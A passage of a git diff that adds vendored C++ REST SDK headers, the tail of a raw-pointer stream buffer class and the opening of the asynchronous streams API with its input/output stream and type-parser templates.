_CharType* _alloc(size_t count) + { + if (!this->can_write()) return nullptr; + + msl::safeint3::SafeInt readhead(m_current_position); + msl::safeint3::SafeInt writeend(m_size); + size_t space_left = (size_t)(writeend - readhead); + + if (space_left < count) return nullptr; + + // Let the caller copy the data + return (_CharType*)(m_data + m_current_position); + } + + /// + /// Submits a block already allocated by the stream buffer. + /// + /// The number of characters to be committed. + void _commit(size_t actual) + { + // Update the write position and satisfy any pending reads + update_current_position(m_current_position + actual); + } + + /// + /// Gets a pointer to the next already allocated contiguous block of data. + /// + /// A reference to a pointer variable that will hold the address of the block on success. + /// The number of contiguous characters available at the address in 'ptr'. + /// true if the operation succeeded, false otherwise. + /// + /// A return of false does not necessarily indicate that a subsequent read operation would fail, only that + /// there is no block to return immediately or that the stream buffer does not support the operation. + /// The stream buffer may not de-allocate the block until is called. + /// If the end of the stream is reached, the function will return true, a null pointer, and a count of zero; + /// a subsequent read will not succeed. + /// + virtual bool acquire(_Out_ _CharType*& ptr, _Out_ size_t& count) + { + count = 0; + ptr = nullptr; + + if (!this->can_read()) return false; + + count = in_avail(); + + if (count > 0) + { + ptr = (_CharType*)(m_data + m_current_position); + return true; + } + else + { + ptr = nullptr; + + // Can only be open for read OR write, not both. If there is no data then + // we have reached the end of the stream so indicate such with true. + return true; + } + } + + /// + /// Releases a block of data acquired using . This frees the stream buffer to + /// de-allocate the memory, if it so desires. Move the read position ahead by the count. + /// + /// A pointer to the block of data to be released. + /// The number of characters that were read. + virtual void release(_Out_writes_opt_(count) _CharType* ptr, _In_ size_t count) + { + if (ptr != nullptr) update_current_position(m_current_position + count); + } + + virtual pplx::task _getn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + return pplx::task_from_result(this->read(ptr, count)); + } + + size_t _sgetn(_Out_writes_(count) _CharType* ptr, _In_ size_t count) { return this->read(ptr, count); } + + virtual size_t _scopy(_Out_writes_(count) _CharType* ptr, _In_ size_t count) + { + return this->read(ptr, count, false); + } + + virtual pplx::task _bumpc() { return pplx::task_from_result(this->read_byte(true)); } + + virtual int_type _sbumpc() { return this->read_byte(true); } + + virtual pplx::task _getc() { return pplx::task_from_result(this->read_byte(false)); } + + int_type _sgetc() { return this->read_byte(false); } + + virtual pplx::task _nextc() + { + if (m_current_position >= m_size - 1) return pplx::task_from_result(basic_streambuf<_CharType>::traits::eof()); + + this->read_byte(true); + return pplx::task_from_result(this->read_byte(false)); + } + + virtual pplx::task _ungetc() + { + auto pos = seekoff(-1, std::ios_base::cur, std::ios_base::in); + if (pos == (pos_type)traits::eof()) return pplx::task_from_result(traits::eof()); + return this->getc(); + } + + /// + /// Gets the current read or write position in the stream. + /// + /// The I/O direction to seek (see remarks) + /// The current position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the direction parameter defines whether to move the read or the write + /// cursor. + virtual pos_type getpos(std::ios_base::openmode mode) const + { + if (((mode & std::ios_base::in) && !this->can_read()) || ((mode & std::ios_base::out) && !this->can_write())) + return static_cast(traits::eof()); + + if (mode == std::ios_base::in) + return (pos_type)m_current_position; + else if (mode == std::ios_base::out) + return (pos_type)m_current_position; + else + return (pos_type)traits::eof(); + } + + /// + /// Seeks to the given position. + /// + /// The offset from the beginning of the stream. + /// The I/O direction to seek (see remarks). + /// The position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. For such streams, the direction parameter + /// defines whether to move the read or the write cursor. + virtual pos_type seekpos(pos_type position, std::ios_base::openmode mode) + { + pos_type beg(0); + pos_type end(m_size); + + if (position >= beg) + { + auto pos = static_cast(position); + + // Read head + if ((mode & std::ios_base::in) && this->can_read()) + { + if (position <= end) + { + // We do not allow reads to seek beyond the end or before the start position. + update_current_position(pos); + return static_cast(m_current_position); + } + } + + // Write head + if ((mode & std::ios_base::out) && this->can_write()) + { + // Update write head and satisfy read requests if any + update_current_position(pos); + + return static_cast(m_current_position); + } + } + + return static_cast(traits::eof()); + } + + /// + /// Seeks to a position given by a relative offset. + /// + /// The relative position to seek to + /// The starting point (beginning, end, current) for the seek. + /// The I/O direction to seek (see remarks) + /// The position. EOF if the operation fails. + /// Some streams may have separate write and read cursors. + /// For such streams, the mode parameter defines whether to move the read or the write cursor. + virtual pos_type seekoff(off_type offset, std::ios_base::seekdir way, std::ios_base::openmode mode) + { + pos_type beg = 0; + pos_type cur = static_cast(m_current_position); + pos_type end = static_cast(m_size); + + switch (way) + { + case std::ios_base::beg: return seekpos(beg + offset, mode); + + case std::ios_base::cur: return seekpos(cur + offset, mode); + + case std::ios_base::end: return seekpos(end + offset, mode); + + default: return static_cast(traits::eof()); + } + } + +private: + template + friend class ::concurrency::streams::rawptr_buffer; + + /// + /// Constructor + /// + /// The address (pointer to) the memory block. + /// The memory block size, measured in number of characters. + basic_rawptr_buffer(const _CharType* data, size_t size) + : streambuf_state_manager<_CharType>(std::ios_base::in) + , m_data(const_cast<_CharType*>(data)) + , m_size(size) + , m_current_position(0) + { + validate_mode(std::ios_base::in); + } + + /// + /// Constructor + /// + /// The address (pointer to) the memory block. + /// The memory block size, measured in number of characters. + /// The stream mode (in, out, etc.). + basic_rawptr_buffer(_CharType* data, size_t size, std::ios_base::openmode mode) + : streambuf_state_manager<_CharType>(mode), m_data(data), m_size(size), m_current_position(0) + { + validate_mode(mode); + } + + static void validate_mode(std::ios_base::openmode mode) + { + // Disallow simultaneous use of the stream buffer for writing and reading. + if ((mode & std::ios_base::in) && (mode & std::ios_base::out)) + throw std::invalid_argument("this combination of modes on raw pointer stream not supported"); + } + + /// + /// Determines if the request can be satisfied. + /// + bool can_satisfy(size_t) const + { + // We can always satisfy a read, at least partially, unless the + // read position is at the very end of the buffer. + return (in_avail() > 0); + } + + /// + /// Reads a byte from the stream and returns it as int_type. + /// Note: This routine must only be called if can_satisfy() returns true. + /// + int_type read_byte(bool advance = true) + { + _CharType value; + auto read_size = this->read(&value, 1, advance); + return read_size == 1 ? static_cast(value) : traits::eof(); + } + + /// + /// Reads up to count characters into ptr and returns the count of characters copied. + /// The return value (actual characters copied) could be <= count. + /// Note: This routine must only be called if can_satisfy() returns true. + /// + size_t read(_Out_writes_(count) _CharType* ptr, _In_ size_t count, bool advance = true) + { + if (!can_satisfy(count)) return 0; + + msl::safeint3::SafeInt request_size(count); + msl::safeint3::SafeInt read_size = request_size.Min(in_avail()); + + size_t newPos = m_current_position + read_size; + + auto readBegin = m_data + m_current_position; + auto readEnd = m_data + newPos; + +#if defined(_ITERATOR_DEBUG_LEVEL) && _ITERATOR_DEBUG_LEVEL != 0 + // Avoid warning C4996: Use checked iterators under SECURE_SCL + std::copy(readBegin, readEnd, stdext::checked_array_iterator<_CharType*>(ptr, count)); +#else + std::copy(readBegin, readEnd, ptr); +#endif // _WIN32 + + if (advance) + { + update_current_position(newPos); + } + + return (size_t)read_size; + } + + /// + /// Write count characters from the ptr into the stream buffer + /// + size_t write(const _CharType* ptr, size_t count) + { + if (!this->can_write() || (count == 0)) return 0; + + msl::safeint3::SafeInt newSize = msl::safeint3::SafeInt(count) + m_current_position; + + if (newSize > m_size) throw std::runtime_error("Writing past the end of the buffer"); + + // Copy the data +#if defined(_ITERATOR_DEBUG_LEVEL) && _ITERATOR_DEBUG_LEVEL != 0 + // Avoid warning C4996: Use checked iterators under SECURE_SCL + std::copy(ptr, ptr + count, stdext::checked_array_iterator<_CharType*>(m_data, m_size, m_current_position)); +#else + std::copy(ptr, ptr + count, m_data + m_current_position); +#endif // _WIN32 + + // Update write head and satisfy pending reads if any + update_current_position(newSize); + + return count; + } + + /// + /// Updates the current read or write position + /// + void update_current_position(size_t newPos) + { + // The new write head + m_current_position = newPos; + + _ASSERTE(m_current_position <= m_size); + } + + // The actual memory block + _CharType* m_data; + + // The size of the memory block + size_t m_size; + + // Read/write head + size_t m_current_position; +}; + +} // namespace details + +/// +/// The rawptr_buffer class serves as a memory-based stream buffer that supports reading +/// sequences of characters to or from a fixed-size block. Note that it cannot be used simultaneously for reading as +/// well as writing. +/// +/// +/// The data type of the basic element of the rawptr_buffer. +/// +template +class rawptr_buffer : public streambuf<_CharType> +{ +public: + typedef _CharType char_type; + + /// + /// Create a rawptr_buffer given a pointer to a memory block and the size of the block. + /// + /// The address (pointer to) the memory block. + /// The memory block size, measured in number of characters. + rawptr_buffer(const char_type* data, size_t size) + : streambuf(std::shared_ptr>( + new details::basic_rawptr_buffer(data, size))) + { + } + + /// + /// Create a rawptr_buffer given a pointer to a memory block and the size of the block. + /// + /// The address (pointer to) the memory block. + /// The memory block size, measured in number of characters. + rawptr_buffer(char_type* data, size_t size, std::ios_base::openmode mode = std::ios::out) + : streambuf(std::shared_ptr>( + new details::basic_rawptr_buffer(data, size, mode))) + { + } + + /// + /// Default constructor. + /// + rawptr_buffer() {} +}; + +/// +/// The rawptr_stream class is used to create memory-backed streams that support writing or reading +/// sequences of characters to / from a fixed-size block. +/// +/// +/// The data type of the basic element of the rawptr_stream. +/// +template +class rawptr_stream +{ +public: + typedef _CharType char_type; + typedef rawptr_buffer<_CharType> buffer_type; + + /// + /// Create a rawptr-stream given a pointer to a read-only memory block and the size of the block. + /// + /// The address (pointer to) the memory block. + /// The memory block size, measured in number of characters. + /// An opened input stream. + static concurrency::streams::basic_istream open_istream(const char_type* data, size_t size) + { + return concurrency::streams::basic_istream(buffer_type(data, size)); + } + + /// + /// Create a rawptr-stream given a pointer to a writable memory block and the size of the block. + /// + /// The address (pointer to) the memory block. + /// The memory block size, measured in number of characters. + /// An opened input stream. + static concurrency::streams::basic_istream open_istream(char_type* data, size_t size) + { + return concurrency::streams::basic_istream(buffer_type(data, size, std::ios::in)); + } + + /// + /// Create a rawptr-stream given a pointer to a writable memory block and the size of the block. + /// + /// The address (pointer to) the memory block. + /// The memory block size, measured in number of characters. + /// An opened output stream. + static concurrency::streams::basic_ostream open_ostream(char_type* data, size_t size) + { + return concurrency::streams::basic_ostream(buffer_type(data, size, std::ios::out)); + } +}; + +} // namespace streams +} // namespace Concurrency + +#endif diff --git a/Src/Common/CppRestSdk/include/cpprest/streams.h b/Src/Common/CppRestSdk/include/cpprest/streams.h new file mode 100644 index 0000000..6583214 --- /dev/null +++ b/Src/Common/CppRestSdk/include/cpprest/streams.h @@ -0,0 +1,1755 @@ +/*** + * Copyright (C) Microsoft. All rights reserved. + * Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. + * + * =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ + * + * Asynchronous I/O: streams API, used for formatted input and output, based on unformatted I/O using stream buffers + * + * For the latest on this and related APIs, please see: https://github.com/Microsoft/cpprestsdk + * + * =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + ****/ +#pragma once + +#ifndef CASA_STREAMS_H +#define CASA_STREAMS_H + +#include "Common/CppRestSdk/include/cpprest/astreambuf.h" +#include + +namespace Concurrency +{ +namespace streams +{ +template +class basic_ostream; +template +class basic_istream; + +namespace details +{ +template +class basic_ostream_helper +{ +public: + basic_ostream_helper(streams::streambuf buffer) : m_buffer(buffer) {} + + ~basic_ostream_helper() {} + +private: + template + friend class streams::basic_ostream; + + concurrency::streams::streambuf m_buffer; +}; + +template +class basic_istream_helper +{ +public: + basic_istream_helper(streams::streambuf buffer) : m_buffer(buffer) {} + + ~basic_istream_helper() {} + +private: + template + friend class streams::basic_istream; + + concurrency::streams::streambuf m_buffer; +}; + +template +struct Value2StringFormatter +{ + template + static std::basic_string format(const T& val) + { + std::basic_ostringstream ss; + ss << val; + return ss.str(); + } +}; + +template<> +struct Value2StringFormatter +{ + template + static std::basic_string format(const T& val) + { + std::basic_ostringstream ss; + ss << val; + return reinterpret_cast(ss.str().c_str()); + } + + static std::basic_string format(const utf16string& val) + { + return format(utility::conversions::utf16_to_utf8(val)); + } +}; + +static const char* _in_stream_msg = "stream not set up for input of data"; +static const char* _in_streambuf_msg = "stream buffer not set up for input of data"; +static const char* _out_stream_msg = "stream not set up for output of data"; +static const char* _out_streambuf_msg = "stream buffer not set up for output of data"; +} // namespace details + +/// +/// Base interface for all asynchronous output streams. +/// +template +class basic_ostream +{ +public: + typedef char_traits traits; + typedef typename traits::int_type int_type; + typedef typename traits::pos_type pos_type; + typedef typename traits::off_type off_type; + + /// + /// Default constructor + /// + basic_ostream() {} + + /// + /// Copy constructor + /// + /// The source object + basic_ostream(const basic_ostream& other) : m_helper(other.m_helper) {} + + /// + /// Assignment operator + /// + /// The source object + /// A reference to the stream object that contains the result of the assignment. + basic_ostream& operator=(const basic_ostream& other) + { + m_helper = other.m_helper; + return *this; + } + + /// + /// Constructor + /// + /// A stream buffer. + basic_ostream(streams::streambuf buffer) + : m_helper(std::make_shared>(buffer)) + { + _verify_and_throw(details::_out_streambuf_msg); + } + + /// + /// Close the stream, preventing further write operations. + /// + pplx::task close() const + { + return is_valid() ? helper()->m_buffer.close(std::ios_base::out) : pplx::task_from_result(); + } + + /// + /// Close the stream with exception, preventing further write operations. + /// + /// Pointer to the exception. + pplx::task close(std::exception_ptr eptr) const + { + return is_valid() ? helper()->m_buffer.close(std::ios_base::out, eptr) : pplx::task_from_result(); + } + + /// + /// Put a single character into the stream. + /// + /// A character + pplx::task write(CharType ch) const + { + pplx::task result; + if (!_verify_and_return_task(details::_out_stream_msg, result)) return result; + return helper()->m_buffer.putc(ch); + } + + /// + /// Write a single value of "blittable" type T into the stream. + /// + /// A value of type T. + /// + /// This is not a replacement for a proper binary serialization solution, but it may + /// form the foundation for one. Writing data bit-wise to a stream is a primitive + /// operation of binary serialization. + /// Currently, no attention is paid to byte order. All data is written in the platform's + /// native byte order, which means little-endian on all platforms that have been tested. + /// This function is only available for streams using a single-byte character size. + /// + template + CASABLANCA_DEPRECATED( + "Unsafe API that will be removed in future releases, use one of the other write overloads instead.") + pplx::task write(T value) const + { + static_assert(sizeof(CharType) == 1, "binary write is only supported for single-byte streams"); + static_assert(std::is_trivial::value, "unsafe to use with non-trivial types"); + + pplx::task result; + if (!_verify_and_return_task(details::_out_stream_msg, result)) return result; + + auto copy = std::make_shared(std::move(value)); + return helper() + ->m_buffer.putn_nocopy((CharType*)copy.get(), sizeof(T)) + .then([copy](pplx::task op) -> size_t { return op.get(); }); + } + + /// + /// Write a number of characters from a given stream buffer into the stream. + /// + /// A source stream buffer. + /// The number of characters to write. + pplx::task write(streams::streambuf source, size_t count) const + { + pplx::task result; + if (!_verify_and_return_task(details::_out_stream_msg, result)) return result; + if (!source.can_read()) + return pplx::task_from_exception( + std::make_exception_ptr(std::runtime_error("source buffer not set up for input of data"))); + + if (count == 0) return pplx::task_from_result((size_t)0); + + auto buffer = helper()->m_buffer; + auto data = buffer.alloc(count); + + if (data != nullptr) + { + auto post_read = [buffer](pplx::task op) -> pplx::task { + auto b = buffer; + b.commit(op.get()); + return op; + }; + return source.getn(data, count).then(post_read); + } + else + { + size_t available = 0; + + const bool acquired = source.acquire(data, available); + if (available >= count) + { + auto post_write = [source, data](pplx::task op) -> pplx::task { + auto s = source; + s.release(data, op.get()); + return op; + }; + return buffer.putn_nocopy(data, count).then(post_write); + } + else + { + // Always have to release if acquire returned true. + if (acquired) + { + source.release(data, 0); + } + + std::shared_ptr buf(new CharType[count], [](CharType* buf) { delete[] buf; }); + + auto post_write = [buf](pplx::task op) -> pplx::task { return op; }; + auto post_read = [buf, post_write, buffer](pplx::task op) -> pplx::task { + auto b = buffer; + return b.putn_nocopy(buf.get(), op.get()).then(post_write); + }; + + return source.getn(buf.get(), count).then(post_read); + } + } + } + + /// + /// Write the specified string to the output stream. + /// + /// Input string. + pplx::task print(const std::basic_string& str) const + { + pplx::task result; + if (!_verify_and_return_task(details::_out_stream_msg, result)) return result; + + if (str.empty()) + { + return pplx::task_from_result(0); + } + else + { + auto sharedStr = std::make_shared>(str); + return helper()->m_buffer.putn_nocopy(sharedStr->c_str(), sharedStr->size()).then([sharedStr](size_t size) { + return size; + }); + } + } + + /// + /// Write a value of type T to the output stream. + /// + /// + /// The data type of the object to be written to the stream + /// + /// Input object. + template + pplx::task print(const T& val) const + { + pplx::task result; + if (!_verify_and_return_task(details::_out_stream_msg, result)) return result; + // TODO in the future this could be improved to have Value2StringFormatter avoid another unnecessary copy + // by putting the string on the heap before calling the print string overload. + return print(details::Value2StringFormatter::format(val)); + } + + /// + /// Write a value of type T to the output stream and append a newline character. + /// + /// + /// The data type of the object to be written to the stream + /// + /// Input object. + template + pplx::task print_line(const T& val) const + { + pplx::task result; + if (!_verify_and_return_task(details::_out_stream_msg, result)) return result; + auto str = details::Value2StringFormatter::format(val); + str.push_back(CharType('\n')); + return print(str); + } + + /// + /// Flush any buffered output data. + /// + pplx::task flush() const + { + pplx::task result; + if (!_verify_and_return_task(details::_out_stream_msg, result)) return result; + return helper()->m_buffer.sync(); + } + + /// + /// Seeks to the specified write position. + /// + /// An offset relative to the beginning of the stream. + /// The new position in the stream. + pos_type seek(pos_type pos) const + { + _verify_and_throw(details::_out_stream_msg); + return helper()->m_buffer.seekpos(pos, std::ios_base::out); + } + + /// + /// Seeks to the specified write position. + /// + /// An offset relative to the beginning, current write position, or the end of the stream. + /// The starting point (beginning, current, end) for the seek. + /// The new position in the stream. + pos_type seek(off_type off, std::ios_base::seekdir way) const + { + _verify_and_throw(details::_out_stream_msg); + return helper()->m_buffer.seekoff(off, way, std::ios_base::out); + } + + /// + /// Get the current write position, i.e. the offset from the beginning of the stream. + /// + /// The current write position. + pos_type tell() const + { + _verify_and_throw(details::_out_stream_msg); + return helper()->m_buffer.getpos(std::ios_base::out); + } + + /// + /// can_seek is used to determine whether the stream supports seeking. + /// + /// true if the stream supports seeking, false otherwise. + bool can_seek() const { return is_valid() && m_helper->m_buffer.can_seek(); } + + /// + /// Test whether the stream has been initialized with a valid stream buffer. + /// + /// true if the stream has been initialized with a valid stream buffer, false + /// otherwise. + bool is_valid() const { return (m_helper != nullptr) && ((bool)m_helper->m_buffer); } + + /// + /// Test whether the stream has been initialized or not. + /// + operator bool() const { return is_valid(); } + + /// + /// Test whether the stream is open for writing. + /// + /// true if the stream is open for writing, false otherwise. + bool is_open() const { return is_valid() && m_helper->m_buffer.can_write(); } + + /// + /// Get the underlying stream buffer. + /// + /// The underlying stream buffer. + concurrency::streams::streambuf streambuf() const { return helper()->m_buffer; } + +protected: + void set_helper(std::shared_ptr> helper) { m_helper = helper; } + +private: + template + bool _verify_and_return_task(const char* msg, pplx::task& tsk) const + { + auto buffer = helper()->m_buffer; + if (!(buffer.exception() == nullptr)) + { + tsk = pplx::task_from_exception(buffer.exception()); + return false; + } + if (!buffer.can_write()) + { + tsk = pplx::task_from_exception(std::make_exception_ptr(std::runtime_error(msg))); + return false; + } + return true; + } + + void _verify_and_throw(const char* msg) const + { + auto buffer = helper()->m_buffer; + if (!(buffer.exception() == nullptr)) std::rethrow_exception(buffer.exception()); + if (!buffer.can_write()) throw std::runtime_error(msg); + } + + std::shared_ptr> helper() const + { + if (!m_helper) throw std::logic_error("uninitialized stream object"); + return m_helper; + } + + std::shared_ptr> m_helper; +}; + +template +struct _type_parser_integral_traits +{ + typedef std::false_type _is_integral; + typedef std::false_type _is_unsigned; +}; + +#ifdef _WIN32 +#define _INT_TRAIT(_t, _low, _high) \ + template<> \ + struct _type_parser_integral_traits<_t> \ + { \ + typedef std::true_type _is_integral; \ + typedef std::false_type _is_unsigned; \ + static const int64_t _min = _low; \ + static const int64_t _max = _high; \ + }; +#define _UINT_TRAIT(_t, _low, _high) \ + template<> \ + struct _type_parser_integral_traits<_t> \ + { \ + typedef std::true_type _is_integral; \ + typedef std::true_type _is_unsigned; \ + static const uint64_t _max = _high; \ + }; + +_INT_TRAIT(char, INT8_MIN, INT8_MAX) +_INT_TRAIT(signed char, INT8_MIN, INT8_MAX) +_INT_TRAIT(short, INT16_MIN, INT16_MAX) +#if defined(_NATIVE_WCHAR_T_DEFINED) +_INT_TRAIT(wchar_t, WCHAR_MIN, WCHAR_MAX) +#endif +_INT_TRAIT(int, INT32_MIN, INT32_MAX) +_INT_TRAIT(long, LONG_MIN, LONG_MAX) +_INT_TRAIT(long long, LLONG_MIN, LLONG_MAX) +_UINT_TRAIT(unsigned char, UINT8_MIN, UINT8_MAX) +_UINT_TRAIT(unsigned short, UINT16_MIN, UINT16_MAX) +_UINT_TRAIT(unsigned int, UINT32_MIN, UINT32_MAX) +_UINT_TRAIT(unsigned long, ULONG_MIN, ULONG_MAX) +_UINT_TRAIT(unsigned long long, ULLONG_MIN, ULLONG_MAX) +#else +#define _INT_TRAIT(_t) \ + template<> \ + struct _type_parser_integral_traits<_t> \ + { \ + typedef std::true_type _is_integral; \ + typedef std::false_type _is_unsigned; \ + static const int64_t _min = std::numeric_limits<_t>::min(); \ + static const int64_t _max = (std::numeric_limits<_t>::max)(); \ + }; +#define _UINT_TRAIT(_t) \ + template<> \ + struct _type_parser_integral_traits<_t> \ + { \ + typedef std::true_type _is_integral; \ + typedef std::true_type _is_unsigned; \ + static const uint64_t _max = (std::numeric_limits<_t>::max)(); \ + }; + +_INT_TRAIT(char) +_INT_TRAIT(signed char) +_INT_TRAIT(short) +_INT_TRAIT(utf16char) +_INT_TRAIT(int) +_INT_TRAIT(long) +_INT_TRAIT(long long) +_UINT_TRAIT(unsigned char) +_UINT_TRAIT(unsigned short) +_UINT_TRAIT(unsigned int) +_UINT_TRAIT(unsigned long) +_UINT_TRAIT(unsigned long long) +#endif + +template +class _type_parser_base +{ +public: + typedef char_traits traits; + typedef typename traits::int_type int_type; + + _type_parser_base() {} + +protected: + // Aid in parsing input: skipping whitespace characters. + static pplx::task _skip_whitespace(streams::streambuf buffer); + + // Aid in parsing input: peek at a character at a time, call type-specific code to examine, extract value when done. + // AcceptFunctor should model std::function, int_type)> + // ExtractFunctor should model std::function(std::shared_ptr)> + template + static pplx::task _parse_input(streams::streambuf buffer, + AcceptFunctor accept_character, + ExtractFunctor extract); +}; + +/// +/// Class used to handle asynchronous parsing for basic_istream::extract. To support new +/// types create a new template specialization and implement the parse function. +/// +template +class type_parser +{ +public: + static pplx::task parse(streams::streambuf buffer) + { + typename _type_parser_integral_traits::_is_integral ii; + typename _type_parser_integral_traits::_is_unsigned ui; + return _parse(buffer, ii, ui); + } + +private: + static pplx::task _parse(streams::streambuf buffer, std::false_type, std::false_type) + { + _parse_floating_point(buffer); + } + + static pplx::task _parse(streams::streambuf, std::false_type, std::true_type) + { +#ifdef _WIN32 + static_assert(false, "type is not supported for extraction from a stream"); +#else + throw std::runtime_error("type is not supported for extraction from a stream"); +#endif + } + + static pplx::task _parse(streams::streambuf buffer, std::true_type, std::false_type) + { + return type_parser::parse(buffer).then([](pplx::task op) -> T { + int64_t val = op.get(); + if (val <= _type_parser_integral_traits::_max && val >= _type_parser_integral_traits::_min) + return (T)val; + else + throw std::range_error("input out of range for target type"); + }); + } + + static pplx::task _parse(streams::streambuf buffer, std::true_type, std::true_type) + { + return type_parser::parse(buffer).then([](pplx::task op) -> T { + uint64_t val = op.get(); + if (val <= _type_parser_integral_traits::_max) + return (T)val; + else + throw std::range_error("input out of range for target type"); + }); + } +}; + +/// +/// Base interface for all asynchronous input streams. +/// +template +class basic_istream +{ +public: + typedef char_traits traits; + typedef typename traits::int_type int_type; + typedef typename traits::pos_type pos_type; + typedef typename traits::off_type off_type; + + /// + /// Default constructor + /// + basic_istream() {} + + /// + /// Constructor + /// + /// + /// The data type of the basic element of the stream. + /// + /// A stream buffer. + template + basic_istream(streams::streambuf buffer) + : m_helper(std::make_shared>(std::move(buffer))) + { + _verify_and_throw(details::_in_streambuf_msg); + } + + /// + /// Copy constructor + /// + /// The source object + basic_istream(const basic_istream& other) : m_helper(other.m_helper) {} + + /// + /// Assignment operator + /// + /// The source object + /// A reference to the stream object that contains the result of the assignment. + basic_istream& operator=(const basic_istream& other) + { + m_helper = other.m_helper; + return *this; + } + + /// + /// Close the stream, preventing further read operations. + /// + pplx::task close() const + { + return is_valid() ? helper()->m_buffer.close(std::ios_base::in) : pplx::task_from_result(); + } + + /// + /// Close the stream with exception, preventing further read operations. + /// + /// Pointer to the exception. + pplx::task close(std::exception_ptr eptr) const + { + return is_valid() ? m_helper->m_buffer.close(std::ios_base::in, eptr) : pplx::task_from_result(); + } + + /// + /// Tests whether last read cause the stream reach EOF. + /// + /// True if the read head has reached the end of the stream, false otherwise. + bool is_eof() const { return is_valid() ? m_helper->m_buffer.is_eof() : false; } + + /// + /// Get the next character and return it as an int_type. Advance the read position. + /// + /// A task that holds the next character as an int_type on successful completion. + pplx::task read() const + { + pplx::task result; + if (!_verify_and_return_task(details::_in_stream_msg, result)) return result; + return helper()->m_buffer.bumpc(); + } + + /// + /// Read a single value of "blittable" type T from the stream. + /// + /// A value of type T. + /// + /// This is not a replacement for a proper binary serialization solution, but it may + /// form the foundation for one. Reading data bit-wise to a stream is a primitive + /// operation of binary serialization. + /// Currently, no attention is paid to byte order. All data is read in the platform's + /// native byte order, which means little-endian on all platforms that have been tested. + /// This function is only available for streams using a single-byte character size. + /// + template + CASABLANCA_DEPRECATED( + "Unsafe API that will be removed in future releases, use one of the other read overloads instead.") + pplx::task read() const + { + static_assert(sizeof(CharType) == 1, "binary read is only supported for single-byte streams"); + static_assert(std::is_trivial::value, "unsafe to use with non-trivial types"); + + pplx::task result; + if (!_verify_and_return_task(details::_in_stream_msg, result)) return result; + + auto copy = std::make_shared(); + return helper()->m_buffer.getn((CharType*)copy.get(), sizeof(T)).then([copy](pplx::task) -> T { + return std::move(*copy); + }); + } + + /// + /// Reads up to count characters and place into the provided buffer. + /// + /// An async stream buffer supporting write operations. + /// The maximum number of characters to read + /// A task that holds the number of characters read. This number is 0 if the end of the stream is + /// reached. + pplx::task read(streams::streambuf target, size_t count) const + { + pplx::task result; + if (!_verify_and_return_task(details::_in_stream_msg, result)) return result; + if (!target.can_write()) + return pplx::task_from_exception( + std::make_exception_ptr(std::runtime_error("target not set up for output of data"))); + + // Capture 'buffer' rather than 'helper' here due to VC++ 2010 limitations. + auto buffer = helper()->m_buffer; + + auto data = target.alloc(count); + + if (data != nullptr) + { + auto post_read = [target](pplx::task op) -> pplx::task { + auto t = target; + t.commit(op.get()); + return op; + }; + return buffer.getn(data, count).then(post_read); + } + else + { + size_t available = 0; + + const bool acquired = buffer.acquire(data, available); + if (available >= count) + { + auto post_write = [buffer, data](pplx::task op) -> pplx::task { + auto b = buffer; + b.release(data, op.get()); + return op; + }; + return target.putn_nocopy(data, count).then(post_write); + } + else + { + // Always have to release if acquire returned true. + if (acquired) + { + buffer.release(data, 0); + } + + std::shared_ptr buf(new CharType[count], [](CharType* buf) { delete[] buf; }); + + auto post_write = [buf](pplx::task op) -> pplx::task { return op; }; + auto post_read = [buf, target, post_write](pplx::task op) -> pplx::task { + auto trg = target; + return trg.putn_nocopy(buf.get(), op.get()).then(post_write); + }; + + return helper()->m_buffer.getn(buf.get(), count).then(post_read); + } + } + } + + /// + /// Get the next character and return it as an int_type. Do not advance the read position. + /// + /// A task that holds the character, widened to an integer. This character is EOF when the peek + /// operation fails. + pplx::task peek() const + { + pplx::task result; + if (!_verify_and_return_task(details::_in_stream_msg, result)) return result; + return helper()->m_buffer.getc(); + } + + /// + /// Read characters until a delimiter or EOF is found, and place them into the target. + /// Proceed past the delimiter, but don't include it in the target buffer. + /// + /// An async stream buffer supporting write operations. + /// The delimiting character to stop the read at. + /// A task that holds the number of characters read. + pplx::task read_to_delim(streams::streambuf target, int_type delim) const + { + pplx::task result; + if (!_verify_and_return_task(details::_in_stream_msg, result)) return result; + if (!target.can_write()) + return pplx::task_from_exception( + std::make_exception_ptr(std::runtime_error("target not set up for output of data"))); + + // Capture 'buffer' rather than 'helper' here due to VC++ 2010 limitations. + auto buffer = helper()->m_buffer; + + int_type req_async = traits::requires_async(); + + std::shared_ptr<_read_helper> _locals = std::make_shared<_read_helper>(); + + auto flush = [=]() mutable { + return target.putn_nocopy(_locals->outbuf, _locals->write_pos).then([=](size_t wrote) mutable { + _locals->total += wrote; + _locals->write_pos = 0; + return target.sync(); + }); + }; + + auto update = [=](int_type ch) mutable { + if (ch == traits::eof()) return false; + if (ch == delim) return false; + + _locals->outbuf[_locals->write_pos] = static_cast(ch); + _locals->write_pos += 1; + + if (_locals->is_full()) + { + // Flushing synchronously because performance is terrible if we + // schedule an empty task. This isn't on a user's thread. + flush().get(); + } + + return true; + }; + + auto loop = pplx::details::_do_while([=]() mutable -> pplx::task { + while (buffer.in_avail() > 0) + { + int_type ch = buffer.sbumpc(); + + if (ch == req_async) + { + break; + } + + if (!update(ch)) + { + return pplx::task_from_result(false); + } + } + return buffer.bumpc().then(update); + }); + + return loop.then([=](bool) mutable { return flush().then([=] { return _locals->total; }); }); + } + + /// + /// Read until reaching a newline character. The newline is not included in the target. + /// + /// An asynchronous stream buffer supporting write operations. + /// A task that holds the number of characters read. This number is 0 if the end of the stream is + /// reached. + pplx::task read_line(streams::streambuf target) const + { + pplx::task result; + if (!_verify_and_return_task(details::_in_stream_msg, result)) return result; + if (!target.can_write()) + return pplx::task_from_exception( + std::make_exception_ptr(std::runtime_error("target not set up for receiving data"))); + + // Capture 'buffer' rather than 'helper' here due to VC++ 2010 limitations. + concurrency::streams::streambuf buffer = helper()->m_buffer; + + int_type req_async = traits::requires_async(); + + std::shared_ptr<_read_helper> _locals = std::make_shared<_read_helper>(); + + auto flush = [=]() mutable { + return target.putn_nocopy(_locals->outbuf, _locals->write_pos).then([=](size_t wrote) mutable { + _locals->total += wrote; + _locals->write_pos = 0; + return target.sync(); 